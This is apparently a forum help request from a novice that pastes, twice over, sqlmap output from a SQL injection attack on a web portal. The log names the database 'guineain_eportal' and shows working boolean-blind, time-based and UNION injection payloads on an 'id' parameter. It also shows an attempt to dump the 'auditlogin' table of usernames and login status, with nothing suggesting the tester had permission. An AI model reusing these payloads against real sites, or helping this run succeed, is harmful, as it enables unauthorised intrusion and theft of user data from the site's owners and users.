Please i need help. Newbie!!!
[*] starting at 01:45:44
[01:45:45] [WARNING] it appears that you have provided tainted parameter values ('id=999999.9') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[01:45:46] [INFO] resuming back-end DBMS 'mysql'
[01:45:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=999999.9 RLIKE (SELECT (CASE WHEN (7392=7392) THEN 0x3939393939392e39 ELSE 0x28 END))
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=999999.9 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 18 columns
Payload: id=999999.9 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a787171,0x5467434c4e4c4b6c75474d674d614c7647727452475274746154626150716b73736e786d48474f53,0x716b786271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- bfbS
[01:45:52] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.25, PHP 5.5.38
back-end DBMS: MySQL >= 5.0.12
[01:45:52] [INFO] fetching entries of column(s) 'auditdate, audittype, id, loginstatus, username' for table 'auditlogin' in database 'guineain_eportal'
[01:46:00] [INFO] fetching number of column(s) 'auditdate, audittype, id, loginstatus, username' entries for table 'auditlogin' in database 'guineain_eportal'
[01:46:00] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[01:46:00] [INFO] retrieved:
[01:46:25] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[01:49:34] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[01:49:40] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[01:50:24] [WARNING] turning off pre-connect mechanism because of connection time out(s)
[01:51:06] [WARNING] detected HTTP code '200' in validation phase is differing from expected 'None'
[01:51:06] [ERROR] invalid character detected. retrying..
[01:52:34] [ERROR] invalid character detected. retrying..
[01:54:01] [ERROR] invalid character detected. retrying..
[01:55:29] [ERROR] invalid character detected. retrying..
[01:56:58] [ERROR] invalid character detected. retrying..
[01:58:26] [ERROR] unable to properly validate last character value ('0')..
0
[01:58:45] [WARNING] table 'accin' in database 'lootip' appears to be empty
Database:
Please i need help. Newbie!!!
[*] starting at 01:45:44
[01:45:45] [WARNING] it appears that you have provided tainted parameter values ('id=999999.9') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[01:45:46] [INFO] resuming back-end DBMS 'mysql'
[01:45:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=999999.9 RLIKE (SELECT (CASE WHEN (7392=7392) THEN 0x3939393939392e39 ELSE 0x28 END))
[01:45:52] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.25, PHP 5.5.38
back-end DBMS: MySQL >= 5.0.12
[01:45:52] [INFO] fetching entries of column(s) 'auditdate, audittype, id, loginstatus, username' for table 'auditlogin' in database 'guineain_eportal'
[01:46:00] [INFO] fetching number of column(s) 'auditdate, audittype, id, loginstatus, username' entries for table 'auditlogin' in database 'guineain_eportal'
[01:46:00] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[01:46:00] [INFO] retrieved:
[01:46:25] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[01:49:34] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[01:49:40] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[01:50:24] [WARNING] turning off pre-connect mechanism because of connection time out(s)
[01:51:06] [WARNING] detected HTTP code '200' in validation phase is differing from expected 'None'
[01:51:06] [ERROR] invalid character detected. retrying..
[01:52:34] [ERROR] invalid character detected. retrying..
[01:54:01] [ERROR] invalid character detected. retrying..
[01:55:29] [ERROR] invalid character detected. retrying..
[01:56:58] [ERROR] invalid character detected. retrying..
[01:58:26] [ERROR] unable to properly validate last character value ('0')..
0
[01:58:45] [WARNING] table 'accin' in database 'lootip' appears to be empty
Database: